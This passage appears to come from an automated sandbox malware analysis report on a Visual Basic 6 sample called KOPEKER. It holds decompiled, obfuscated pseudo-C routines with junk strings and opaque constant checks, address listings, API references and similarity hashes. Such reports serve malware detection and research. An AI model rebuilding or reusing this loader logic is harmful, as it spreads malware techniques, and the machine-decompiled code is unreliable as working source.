				_push(0x98e72e79);
				_push(0x49db89);
				E00411884();
				 *(_t869 - 0x230) = _t762;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x98e72e79;
				if( *(_t869 - 0x230) == 0x98e72e79) {
					 *((intOrPtr*)(_t869 - 4)) = 0x66;
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						 *(_t869 - 0x2e8) = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						 *(_t869 - 0x2e8) = 0x4183d8;
					}
					 *(_t869 - 0x250) =  *( *(_t869 - 0x2e8));
					_t794 = _t869 - 0x140;
					L004018BE();
					_t762 =  *((intOrPtr*)( *( *(_t869 - 0x250)) + 0x10))( *(_t869 - 0x250), _t794, _t794,  *((intOrPtr*)(_t869 + 8)));
					asm("fclex");
					 *(_t869 - 0x254) = _t762;
					__eflags =  *(_t869 - 0x254);
					if( *(_t869 - 0x254) >= 0) {
						_t483 = _t869 - 0x2ec;
						 *_t483 =  *(_t869 - 0x2ec) & 0x00000000;
						__eflags =  *_t483;
					} else {
						_push(0x10);
						_push(0x411ad0);
						_push( *(_t869 - 0x250));
						_push( *(_t869 - 0x254));
						L00401906();
						 *(_t869 - 0x2ec) = _t762;
					}
					L004018AC();
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x68;
				_push(0x2a551);
				_push(0x98e72e79);
				_push(0x8904d3f8);
				E004118CC();
				 *(_t869 - 0x230) = _t762;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x8904d3f8;
				if( *(_t869 - 0x230) == 0x8904d3f8) {
					 *((intOrPtr*)(_t869 - 4)) = 0x69;
					_t785 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t869 + 8)))) + 0x160))( *((intOrPtr*)(_t869 + 8)), _t869 - 0x140);
					asm("fclex");
					 *(_t869 - 0x250) = _t785;
					__eflags =  *(_t869 - 0x250);
					if( *(_t869 - 0x250) >= 0) {
						_t499 = _t869 - 0x2f0;
						 *_t499 =  *(_t869 - 0x2f0) & 0x00000000;
						__eflags =  *_t499;
					} else {
						_push(0x160);
						_push(0x4105b8);
						_push( *((intOrPtr*)(_t869 + 8)));
						_push( *(_t869 - 0x250));
						L00401906();
						 *(_t869 - 0x2f0) = _t785;
					}
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						 *(_t869 - 0x2f4) = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						 *(_t869 - 0x2f4) = 0x4183d8;
					}
					 *(_t869 - 0x254) =  *( *(_t869 - 0x2f4));
					 *(_t869 - 0x270) =  *(_t869 - 0x140);
					 *(_t869 - 0x140) =  *(_t869 - 0x140) & 0x00000000;
					_t789 = _t869 - 0x144;
					L00401888();
					_t762 =  *((intOrPtr*)( *( *(_t869 - 0x254)) + 0x40))( *(_t869 - 0x254), _t789, _t789,  *(_t869 - 0x270), L"incomprehensible");
					asm("fclex");
					 *(_t869 - 0x258) = _t762;
					__eflags =  *(_t869 - 0x258);
					if( *(_t869 - 0x258) >= 0) {
						_t519 = _t869 - 0x2f8;
						 *_t519 =  *(_t869 - 0x2f8) & 0x00000000;
						__eflags =  *_t519;
					} else {
						_push(0x40);
						_push(0x411ad0);
						_push( *(_t869 - 0x254));
						_push( *(_t869 - 0x258));
						L00401906();
						 *(_t869 - 0x2f8) = _t762;
					}
					L004018AC();
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x6b;
				_push(0x8904d3f8);
				E00411914();
				 *(_t869 - 0x230) = _t762;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x98e72e79;
				if( *(_t869 - 0x230) == 0x98e72e79) {
					 *((intOrPtr*)(_t869 - 4)) = 0x6c;
					 *((intOrPtr*)(_t869 - 4)) = 0x6d;
					 *((intOrPtr*)(_t869 - 0x1ac)) = 0x80020004;
					 *((intOrPtr*)(_t869 - 0x1b4)) = 0xa;
					 *((intOrPtr*)(_t869 - 0x19c)) = 0x80020004;
					 *((intOrPtr*)(_t869 - 0x1a4)) = 0xa;
					 *((intOrPtr*)(_t869 - 0x18c)) = 0x80020004;
					 *((intOrPtr*)(_t869 - 0x194)) = 0xa;
					 *((intOrPtr*)(_t869 - 0x17c)) = 0x80020004;
					 *((intOrPtr*)(_t869 - 0x184)) = 0xa;
					 *((intOrPtr*)(_t869 - 0x16c)) = 0x80020004;
					 *((intOrPtr*)(_t869 - 0x174)) = 0xa;
					 *((intOrPtr*)(_t869 - 0x15c)) = 0x80020004;
					 *((intOrPtr*)(_t869 - 0x164)) = 0xa;
					 *(_t869 - 0x1bc) = L"samtaleemnetsrhes";
					 *((intOrPtr*)(_t869 - 0x1c4)) = 8;
					L004018A0();
					_push(_t869 - 0x1b4);
					_push(_t869 - 0x1a4);
					_push(_t869 - 0x194);
					_push(_t869 - 0x184);
					_push(_t869 - 0x174);
					_push(_t869 - 0x164);
					_push(_t869 - 0x154);
					L0040187C();
					L00401882();
					_push(_t869 - 0x1b4);
					_push(_t869 - 0x1a4);
					_push(_t869 - 0x194);
					_push(_t869 - 0x184);
					_push(_t869 - 0x174);
					_push(_t869 - 0x164);
					_push(_t869 - 0x154);
					_push(7);
					L00401942();
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x6f;
				_push(L"Gastriloquy");
				_t763 = _t869 - 0x134;
				_push(_t763);
				L004018D6();
				_push(_t763);
				E00411970();
				 *(_t869 - 0x230) = _t763;
				L004018D0();
				__eflags =  *(_t869 - 0x230) - 0x2ee60b;
				 *(_t869 - 0x250) =  ~(0 |  *(_t869 - 0x230) == 0x002ee60b);
				L00401924();
				_t767 =  *(_t869 - 0x250);
				__eflags = _t767;
				if(__eflags != 0) {
					 *((intOrPtr*)(_t869 - 4)) = 0x70;
					 *((intOrPtr*)(_t869 - 4)) = 0x71;
					_push(0x1c);
					L00401876();
					 *(_t869 - 0x8c) = _t767;
				}
				 *((intOrPtr*)(_t869 - 4)) = 0x73;
				asm("fldz");
				L00401756();
				L0040193C();
				asm("fcomp qword [0x4013a0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					 *((intOrPtr*)(_t869 - 4)) = 0x74;
					L00401870();
				}
				 *((intOrPtr*)(_t869 - 0x10)) = 0;
				asm("wait");
				_push(0x414a5b);
				L004018AC();
				L004018AC();
				L00401912();
				L00401912();
				L00401924();
				L004018AC();
				L004018AC();
				L004018AC();
				return _t767;
			}













































          0x00406ffa
          0x00406ffa
          0x00406ffb
          0x00406ffd
          0x00406fff
          0x00407001
          0x00407003
          0x00407005
          0x00407007
          0x00407009
          0x0040700b
          0x0040700d
          0x0040700f
          0x00407011
          0x00407013
          0x00407015
          0x004135ce
          0x004135d0
          0x004135d6
          0x004135d6
          0x004135d8
          0x004135da
          0x004135e0
          0x004135e2
          0x004135ea
          0x004135f1
          0x00413600
          0x00413628
          0x00413635
          0x00413639
          0x00413640
          0x00413659
          0x00413668
          0x00413673
          0x00413679
          0x00413686
          0x004136a8
          0x004136a8
          0x004136a8
          0x00413688
          0x00413688
          0x0041368d
          0x00413692
          0x00413695
          0x0041369b
          0x004136a0
          0x004136a0
          0x004136af
          0x004136c5
          0x004136d1
          0x004136d7
          0x004136de
          0x004136ed
          0x00413715
          0x00413722
          0x00413729
          0x00413730
          0x0041373f
          0x0041374d
          0x00413761
          0x00413770
          0x00413776
          0x0041378c
          0x00413792
          0x0041379f
          0x004137c1
          0x004137c1
          0x004137c1
          0x004137a1
          0x004137a1
          0x004137a6
          0x004137ab
          0x004137ae
          0x004137b4
          0x004137b9
          0x004137b9
          0x004137cf
          0x004137d6
          0x004137e5
          0x004137eb
          0x004137f8
          0x0041381a
          0x0041381a
          0x0041381a
          0x004137fa
          0x004137fa
          0x004137ff
          0x00413804
          0x00413807
          0x0041380d
          0x00413812
          0x00413812
          0x00413821
          0x00413833
          0x00413858
          0x00413864
          0x0041386a
          0x00413870
          0x00413875
          0x0041387c
          0x004138a1
          0x004138ad
          0x004138b9
          0x004138bf
          0x004138cc
          0x004138e0
          0x004138f7
          0x00413904
          0x0041390b
          0x00413921
          0x00413927
          0x00413934
          0x00413956
          0x00413956
          0x00413956
          0x00413936
          0x00413936
          0x0041393b
          0x00413940
          0x00413943
          0x00413949
          0x0041394e
          0x0041394e
          0x00413963
          0x0041396f
          0x00413975
          0x00413982
          0x004139ad
          0x004139b3
          0x004139c0
          0x004139e2
          0x004139e2
          0x004139e2
          0x004139c2
          0x004139c2
          0x004139c7
          0x004139cc
          0x004139cf
          0x004139d5
          0x004139da
          0x004139da
          0x004139ef
          0x004139fb
          0x00413a01
          0x00413a0e
          0x00413a22
          0x00413a39
          0x00413a46
          0x00413a4d
          0x00413a54
          0x00413a5d
          0x00413a84
          0x00413a8a
          0x00413a97
          0x00413ab9
          0x00413ab9
          0x00413ab9
          0x00413a99
          0x00413a99
          0x00413a9e
          0x00413aa3
          0x00413aa6
          0x00413aac
          0x00413ab1
          0x00413ab1
          0x00413ac6
          0x00413acc
          0x00413ad5
          0x00413ada
          0x00413af0
          0x00413af6
          0x00413af8
          0x00413b05
          0x00413b27
          0x00413b27
          0x00413b27
          0x00413b07
          0x00413b07
          0x00413b0c
          0x00413b11
          0x00413b14
          0x00413b1a
          0x00413b1f
          0x00413b1f
          0x00413b43
          0x00413b49
          0x00413b4b
          0x00413b58
          0x00413b7a
          0x00413b7a
          0x00413b7a
          0x00413b5a
          0x00413b5a
          0x00413b5f
          0x00413b64
          0x00413b67
          0x00413b6d
          0x00413b72
          0x00413b72
          0x00413b81
          0x00413b88
          0x00413b8f
          0x00413b96
          0x00413ba9
          0x00413bae
          0x00413bae
          0x00413bb5
          0x00413bbf
          0x00413bdb
          0x00413be2
          0x00413be5
          0x00413bea
          0x00413bf1
          0x00413c00
          0x00413c0e
          0x00413c31
          0x00413c37
          0x00413c4d
          0x00413c53
          0x00413c60
          0x00413c82
          0x00413c82
          0x00413c82
          0x00413c62
          0x00413c62
          0x00413c67
          0x00413c6c
          0x00413c6f
          0x00413c75
          0x00413c7a
          0x00413c7a
          0x00413c8f
          0x00413c92
          0x00413ca1
          0x00413ca7
          0x00413cb6
          0x00413cbc
          0x00413cc9
          0x00413ceb
          0x00413ceb
          0x00413ceb
          0x00413ccb
          0x00413ccb
          0x00413cd0
          0x00413cd5
          0x00413cd8
          0x00413cde
          0x00413ce3
          0x00413ce3
          0x00413cf2
          0x00413cf9
          0x00413d08
          0x00413d30
          0x00413d3c
          0x00413d42
          0x00413d49
          0x00413d58
          0x00413d80
          0x00413d8d
          0x00413d94
          0x00413daa
          0x00413db0
          0x00413dbd
          0x00413ddf
          0x00413ddf
          0x00413ddf
          0x00413dbf
          0x00413dbf
          0x00413dc4
          0x00413dc9
          0x00413dcc
          0x00413dd2
          0x00413dd7
          0x00413dd7
          0x00413ded
          0x00413df4
          0x00413e0a
          0x00413e10
          0x00413e1d
          0x00413e3f
          0x00413e3f
          0x00413e3f
          0x00413e1f
          0x00413e1f
          0x00413e24
          0x00413e29
          0x00413e2c
          0x00413e32
          0x00413e37
          0x00413e37
          0x00413e4c
          0x00413e52
          0x00413e64
          0x00413e69
          0x00413e8f
          0x00413e95
          0x00413e9b
          0x00413ea4
          0x00413ea9
          0x00413eb0
          0x00413eba
          0x00413ec7
          0x00413ec8
          0x00413ece
          0x00413ecf
          0x00413ed4
          0x00413ed9
          0x00000000
          0x00000000
          0x00413edb
          0x00413ee0
          0x00413ee7
          0x00413ef1
          0x00413ef1
          0x00413ef2
          0x00413ef2
          0x00413eff
          0x00413f02
          0x00413f03
          0x00413f04
          0x00413f09
          0x00413f10
          0x00413f1a
          0x00413f24
          0x00413f2e
          0x00413f33
          0x00413f38
          0x00413f3e
          0x00413f3f
          0x00413f44
          0x00413f4b
          0x00413f52
          0x00413f59
          0x00413f5a
          0x00413f5f
          0x00413f64
          0x00413f6a
          0x00413f6b
          0x00413f70
          0x00413f71
          0x00413f76
          0x00413f7c
          0x00413f7d
          0x00413f82
          0x00413f83
          0x00413f88
          0x00413f8e
          0x00413f95
          0x00413fa4
          0x00413fb1
          0x00413fb8
          0x00413fbf
          0x00413fc0
          0x00413fc2
          0x00413fc7
          0x00413fd1
          0x00413fd3
          0x00413fd9
          0x00413fe0
          0x00413fe7
          0x00413fee
          0x0041400b
          0x00413ff0
          0x00413ff0
          0x00413ff5
          0x00413ffa
          0x00413fff
          0x00413fff
          0x0041401d
          0x00414030
          0x00414037
          0x0041403c
          0x00414040
          0x00414046
          0x0041404d
          0x00414061
          0x00414064
          0x00414066
          0x0041406c
          0x00414073
          0x00414095
          0x00414095
          0x00414095
          0x00414075
          0x00414075
          0x00414077
          0x0041407c
          0x00414082
          0x00414088
          0x0041408d
          0x0041408d
          0x004140a2
          0x004140ad
          0x004140ad
          0x004140b2
          0x004140b9
          0x004140c3
          0x004140ca
          0x004140cf
          0x004140d5
          0x004140d6
          0x004140db
          0x004140dc
          0x004140e1
          0x004140e8
          0x004140fb
          0x00414100
          0x0041410d
          0x00414119
          0x0041411b
          0x0041411d
          0x00414124
          0x0041412b
          0x00414135
          0x0041413f
          0x00414149
          0x00414153
          0x00414156
          0x00414163
          0x00414164
          0x00414165
          0x00414166
          0x00414167
          0x0041416a
          0x00414177
          0x00414178
          0x00414179
          0x0041417a
          0x0041417b
          0x0041417d
          0x00414182
          0x00414185
          0x0041418a
          0x0041418a
          0x0041418d
          0x00414194
          0x00414199
          0x0041419e
          0x004141a4
          0x004141a5
          0x004141aa
          0x004141ab
          0x004141b0
          0x004141b6
          0x004141b7
          0x004141bc
          0x004141bd
          0x004141c2
          0x004141c7
          0x004141cc
          0x004141d1
          0x004141d7
          0x004141de
          0x004141ed
          0x004141fa
          0x00414201
          0x00414202
          0x00414204
          0x00414209
          0x0041420c
          0x00414213
          0x00414215
          0x00414217
          0x0041421e
          0x00414225
          0x00414227
          0x00414232
          0x00414233
          0x0041423a
          0x0041423b
          0x00414248
          0x00414249
          0x0041424a
          0x0041424b
          0x0041424c
          0x0041424e
          0x00414254
          0x0041425f
          0x0041425f
          0x00414264
          0x0041426b
          0x00414270
          0x00414275
          0x0041427a
          0x0041427f
          0x00414284
          0x0041428a
          0x0041428f
          0x00414299
          0x0041429b
          0x004142a2
          0x004142a9
          0x004142b3
          0x004142c9
          0x004142ce
          0x004142d0
          0x004142d6
          0x004142d7
          0x004142dc
          0x004142e8
          0x004142e8
          0x004142ed
          0x004142f4
          0x004142f9
          0x004142fe
          0x00414303
          0x00414309
          0x0041430e
          0x00414318
          0x0041431e
          0x00414325
          0x0041432f
          0x00414339
          0x00414343
          0x0041434d
          0x00414357
          0x00414361
          0x0041436b
          0x00414381
          0x0041438c
          0x00414393
          0x0041439a
          0x0041439b
          0x004143a3
          0x004143a4
          0x004143af
          0x004143b6
          0x004143bd
          0x004143be
          0x004143c4
          0x004143c5
          0x004143c7
          0x004143cc
          0x004143cc
          0x004143cf
          0x004143e1
          0x004143e6
          0x004143ed
          0x004143ee
          0x004143f3
          0x004143f8
          0x004143fe
          0x004143ff
          0x00414404
          0x0041440a
          0x00414411
          0x00414420
          0x0041442d
          0x00414434
          0x00414435
          0x00414437
          0x0041443f
          0x00414446
          0x00414448
          0x0041444a
          0x00414451
          0x00414456
          0x00414456
          0x0041445b
          0x00414462
          0x00414467
          0x0041446c
          0x00414471
          0x00414477
          0x0041447c
          0x00414486
          0x00414488
          0x0041448f
          0x00414499
          0x004144af
          0x004144ba
          0x004144bb
          0x004144c6
          0x004144c6
          0x004144cb
          0x004144d2
          0x004144d7
          0x004144dd
          0x004144de
          0x004144e3
          0x004144e4
          0x004144e9
          0x004144ee
          0x004144f4
          0x004144fb
          0x0041450a
          0x00414517
          0x0041451c
          0x00414523
          0x00414525
          0x00414527
          0x0041452e
          0x00414535
          0x0041453f
          0x00414555
          0x0041455a
          0x0041455c
          0x00414562
          0x00414563
          0x00414568
          0x00414574
          0x00414574
          0x00414579
          0x00414580
          0x00414585
          0x0041458a
          0x0041458f
          0x00414594
          0x0041459a
          0x0041459f
          0x004145a9
          0x004145af
          0x004145b6
          0x004145bd
          0x004145da
          0x004145bf
          0x004145bf
          0x004145c4
          0x004145c9
          0x004145ce
          0x004145ce
          0x004145ec
          0x004145f5
          0x004145fc
          0x00414610
          0x00414613
          0x00414615
          0x0041461b
          0x00414622
          0x00414644
          0x00414644
          0x00414644
          0x00414624
          0x00414624
          0x00414626
          0x0041462b
          0x00414631
          0x00414637
          0x0041463c
          0x0041463c
          0x00414651
          0x00414651
          0x00414656
          0x0041465d
          0x00414662
          0x00414667
          0x0041466c
          0x00414671
          0x00414677
          0x0041467c
          0x00414686
          0x0041468c
          0x004146a2
          0x004146a8
          0x004146aa
          0x004146b0
          0x004146b7
          0x004146d9
          0x004146d9
          0x004146d9
          0x004146b9
          0x004146b9
          0x004146be
          0x004146c3
          0x004146c6
          0x004146cc
          0x004146d1
          0x004146d1
          0x004146e0
          0x004146e7
          0x00414704
          0x004146e9
          0x004146e9
          0x004146ee
          0x004146f3
          0x004146f8
          0x004146f8
          0x00414716
          0x00414722
          0x00414728
          0x0041473a
          0x00414741
          0x00414755
          0x00414758
          0x0041475a
          0x00414760
          0x00414767
          0x00414789
          0x00414789
          0x00414789
          0x00414769
          0x00414769
          0x0041476b
          0x00414770
          0x00414776
          0x0041477c
          0x00414781
          0x00414781
          0x00414796
          0x00414796
          0x0041479b
          0x004147a2
          0x004147a7
          0x004147ac
          0x004147b2
          0x004147b7
          0x004147c1
          0x004147c7
          0x004147ce
          0x004147d5
          0x004147df
          0x004147e9
          0x004147f3
          0x004147fd
          0x00414807
          0x00414811
          0x0041481b
          0x00414825
          0x0041482f
          0x00414839
          0x00414843
          0x0041484d
          0x00414857
          0x0041486d
          0x00414878
          0x0041487f
          0x00414886
          0x0041488d
          0x00414894
          0x0041489b
          0x004148a2
          0x004148a3
          0x004148b0
          0x004148bb
          0x004148c2
          0x004148c9
          0x004148d0
          0x004148d7
          0x004148de
          0x004148e5
          0x004148e6
          0x004148e8
          0x004148ed
          0x004148f0
          0x004148f7
          0x004148fc
          0x00414902
          0x00414903
          0x00414908
          0x00414909
          0x0041490e
          0x00414914
          0x0041491b
          0x0041492a
          0x00414937
          0x0041493c
          0x00414943
          0x00414945
          0x00414947
          0x0041494e
          0x00414955
          0x00414957
          0x0041495c
          0x0041495c
          0x00414962
          0x00414969
          0x0041496b
          0x00414970
          0x00414975
          0x0041497b
          0x0041497d
          0x0041497e
          0x00414980
          0x00414987
          0x00414987
          0x0041498c
          0x00414993
          0x00414994
          0x00414a11
          0x00414a19
          0x00414a21
          0x00414a29
          0x00414a34
          0x00414a3f
          0x00414a4a
          0x00414a55
          0x00414a5a

          APIs
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059,?,00000086), ref: 004135D6
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,0000070C,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05), ref: 0041369B
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006FC,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 004137B4
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105E8,000006F8,?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012), ref: 0041380D
          • __vbaStrCopy.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413833
          • __vbaFreeStr.MSVBVM60(?,?,?,?,)#,0000009D,3B889C20,00005B06,?,?,98E72E79,00000012,B33C5640,00005B05,?,00000059), ref: 00413870
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckHresult$CopyFree
          • String ID: D$Statscheferstronhi8$rebslagerierneshand$s[$)#
          • API String ID: 339450102-1043960473
          • Opcode ID: 2ec0c361b1126fae7113e2263c8e49ed3c6af6329862bc5457209a1dbdab7286
          • Instruction ID: 808cc1adde80d5d5ae7107b4651ea752de92fb4ca7a003286aae542fa28decbc
          • Opcode Fuzzy Hash: 2ec0c361b1126fae7113e2263c8e49ed3c6af6329862bc5457209a1dbdab7286
          • Instruction Fuzzy Hash: 0B42DE74901229EFDB11DF90CD88BD8BBB4FF08345F0041E6E948AA2A0D7789B94DF08
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00417239, Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 186COMMON
          Download Yara Rule

          Control-flow Graph

          C-Code - Quality: 56%
          			E00417239(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				char _v56;
				char* _v64;
				char _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				signed int _v96;
				signed long long _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _t74;
				signed int _t78;
				char* _t79;
				signed int _t85;
				signed int _t91;
				char* _t101;
				intOrPtr* _t118;
				signed long long _t129;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_push(0x60);
				L004016F0();
				_v12 = _t118;
				_v8 = 0x4016d0;
				_v64 = 0x411f34;
				_v72 = 8;
				L004018A0();
				_t74 =  &_v56;
				_push(_t74); // executed
				L00401816(); // executed
				L00401882();
				_push(_t74);
				_push(0);
				L0040184C();
				asm("sbb eax, eax");
				_v76 =  ~( ~_t74 + 1);
				L00401924();
				_t101 =  &_v56;
				L00401912();
				_t78 = _v76;
				if(_t78 != 0) {
					_push(_t101);
					 *_t118 =  *0x4016c8;
					_t129 =  *0x4016c0 *  *0x401618;
					if( *0x418000 != 0) {
						_push( *0x401614);
						_push( *0x401610);
						L00401714();
					} else {
						_t129 = _t129 /  *0x401610;
					}
					_v100 = _t129;
					 *_t118 = _v100;
					_v64 =  *0x4016b8;
					L0040183A();
					_v72 =  *0x4016a8;
					_v76 =  *0x4014c8;
					_v80 =  *0x4014c8;
					_t78 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t101, _t101, _t101, _t78, _t101, _t101);
					asm("fclex");
					_v76 = _t78;
					if(_v76 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x4105b8);
						_push(_a4);
						_push(_v76);
						L00401906();
						_v104 = _t78;
					}
				}
				_push(0x411f40);
				_push(0x411f40);
				L0040184C();
				if(_t78 != 0) {
					if( *0x4183d8 != 0) {
						_v108 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v108 = 0x4183d8;
					}
					_v76 =  *_v108;
					_t85 =  *((intOrPtr*)( *_v76 + 0x4c))(_v76,  &_v36);
					asm("fclex");
					_v80 = _t85;
					if(_v80 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x411ad0);
						_push(_v76);
						_push(_v80);
						L00401906();
						_v112 = _t85;
					}
					_v84 = _v36;
					_v64 = 0x75;
					_v72 = 2;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t91 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84, 0x10,  &_v40);
					asm("fclex");
					_v88 = _t91;
					if(_v88 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411dac);
						_push(_v84);
						_push(_v88);
						L00401906();
						_v116 = _t91;
					}
					_v96 = _v40;
					_v40 = _v40 & 0x00000000;
					_push(_v96);
					_push( &_v28);
					L00401888();
					L004018AC();
				}
				_v64 = L"Colmars8";
				_v72 = 8;
				L004018A0();
				_push(0);
				_t79 =  &_v56;
				_push(_t79); // executed
				L0040178C(); // executed
				L00401882();
				L00401912();
				asm("wait");
				_push(0x4174d9);
				L00401924();
				L004018AC();
				return _t79;
			}































          0x0041723e
          0x00417249
          0x0041724a
          0x00417251
          0x00417254
          0x0041725c
          0x0041725f
          0x00417266
          0x0041726d
          0x0041727a
          0x0041727f
          0x00417282
          0x00417283
          0x0041728d
          0x00417292
          0x00417293
          0x00417295
          0x0041729c
          0x004172a1
          0x004172a8
          0x004172ad
          0x004172b0
          0x004172b5
          0x004172bb
          0x004172c7
          0x004172c8
          0x004172d1
          0x004172de
          0x004172e8
          0x004172ee
          0x004172f4
          0x004172e0
          0x004172e0
          0x004172e0
          0x004172f9
          0x00417300
          0x0041730a
          0x00417313
          0x00417320
          0x0041732a
          0x00417334
          0x00417344
          0x0041734a
          0x0041734c
          0x00417353
          0x0041736f
          0x00417355
          0x00417355
          0x0041735a
          0x0041735f
          0x00417362
          0x00417365
          0x0041736a
          0x0041736a
          0x00417353
          0x00417373
          0x00417378
          0x0041737d
          0x00417384
          0x00417391
          0x004173ab
          0x00417393
          0x00417393
          0x00417398
          0x0041739d
          0x004173a2
          0x004173a2
          0x004173b7
          0x004173c6
          0x004173c9
          0x004173cb
          0x004173d2
          0x004173eb
          0x004173d4
          0x004173d4
          0x004173d6
          0x004173db
          0x004173de
          0x004173e1
          0x004173e6
          0x004173e6
          0x004173f2
          0x004173f5
          0x004173fc
          0x0041740a
          0x00417414
          0x00417415
          0x00417416
          0x00417417
          0x00417420
          0x00417423
          0x00417425
          0x0041742c
          0x00417445
          0x0041742e
          0x0041742e
          0x00417430
          0x00417435
          0x00417438
          0x0041743b
          0x00417440
          0x00417440
          0x0041744c
          0x0041744f
          0x00417453
          0x00417459
          0x0041745a
          0x00417462
          0x00417462
          0x00417467
          0x0041746e
          0x0041747b
          0x00417480
          0x00417482
          0x00417485
          0x00417486
          0x00417490
          0x00417498
          0x0041749d
          0x0041749e
          0x004174cb
          0x004174d3
          0x004174d8

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00417254
          • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041727A
          • #667.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00417283
          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 0041728D
          • __vbaStrCmp.MSVBVM60(00000000,00000000,?), ref: 00417295
          • __vbaFreeStr.MSVBVM60(00000000,00000000,?), ref: 004172A8
          • __vbaFreeVar.MSVBVM60(00000000,00000000,?), ref: 004172B0
          • _adj_fdiv_m64.MSVBVM60(?,00000000,00000000,?), ref: 004172F4
          • __vbaFpI4.MSVBVM60(?,?,?,00000000,00000000,?), ref: 00417313
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,000002C0,?,?,?,00000000,?,?,?,00000000,00000000,?), ref: 00417365
          • __vbaStrCmp.MSVBVM60(00411F40,00411F40,00000000,00000000,?), ref: 0041737D
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411F40,00411F40,00000000,00000000,?), ref: 0041739D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000004C,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 004173E1
          • __vbaChkstk.MSVBVM60(?,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 0041740A
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411DAC,0000001C,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 0041743B
          • __vbaObjSet.MSVBVM60(?,?,?,?,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 0041745A
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00411F40,00411F40,00000000,00000000,?), ref: 00417462
          • __vbaVarDup.MSVBVM60(00411F40,00411F40,00000000,00000000,?), ref: 0041747B
          • #645.MSVBVM60(?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 00417486
          • __vbaStrMove.MSVBVM60(?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 00417490
          • __vbaFreeVar.MSVBVM60(?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 00417498
          • __vbaFreeStr.MSVBVM60(004174D9,?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 004174CB
          • __vbaFreeObj.MSVBVM60(004174D9,?,00000000,00411F40,00411F40,00000000,00000000,?), ref: 004174D3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckHresult$ChkstkMove$#645#667New2_adj_fdiv_m64
          • String ID: Colmars8$tmp$u
          • API String ID: 4120384274-4136535519
          • Opcode ID: a7af0549e2f10f762b6e209b8676b3ff17c3df8b27577f8ac6b6928b1a0aad03
